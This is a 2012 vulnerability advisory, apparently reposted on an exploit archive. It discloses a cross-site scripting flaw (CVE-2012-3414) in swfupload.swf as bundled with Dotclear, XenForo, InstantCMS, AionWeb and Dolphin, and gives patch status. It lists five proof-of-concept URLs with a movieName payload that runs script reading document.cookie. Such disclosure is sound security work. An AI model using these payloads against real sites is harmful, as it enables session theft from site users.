SWF Upload Cross Site Scripting

SWF Upload Cross Site Scripting: Posted Nov 13, 2012; Authored by MustLive; Dotclear, InstantCMS, AionWeb, and Dolphin all include a version of swfupload.swf that suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2012-3414; SHA-256 | a2a158397ae79c78e46a0c4935d002352662c55b69f1181ce13b4acd1f39d885; Download | Favorite | View

SWF Upload Cross Site Scripting

Hello list!

I will draw your attention to XSS vulnerability in other web applications 
with swfupload. Earlier I've wrote about swfupload in WordPress 
(CVE-2012-3414) and that this hole is available in many web applications.

In previous letter I've wrote the information about different versions of 
this swf-file (with different names) and all versions of WordPress, which 
contain any of these swf-files. And here is information about Dotclear, 
XenForo, InstantCMS, AionWeb, Dolphin - among multiple web applications 
which are bundled with swfupload.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb, 
Dolphin. There is no information that they have fixed this vulnerability in 
their software (at that this vulnerability was fixed in WordPress 3.3.2 at 
20.04.2012).

Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this 
vulnerability was fixed and patch was released for previous versions 
(already at 19.06.2012).

The developers of WordPress released new version of flash file (the same did 
the developers of XenForo), which could be used by all web developers, which 
were using swfupload.

----------
Details:
----------

XSS (WASC-08):

Dotclear:

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

InstantCMS:

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Swfupload is used in WordPress, plugins for WP and in other web 
applications. There are many web applications with it, not as many as those 
which are using JW Player (http://securityvulns.com/docs28176.html) and JW 
Player Pro (http://securityvulns.com/docs28483.html) (vulnerabilities in 
them I've disclosed earlier), but still a lot of.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

SWF Upload Cross Site Scripting

SWF Upload Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SWF Upload Cross Site Scripting

Share This

SWF Upload Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems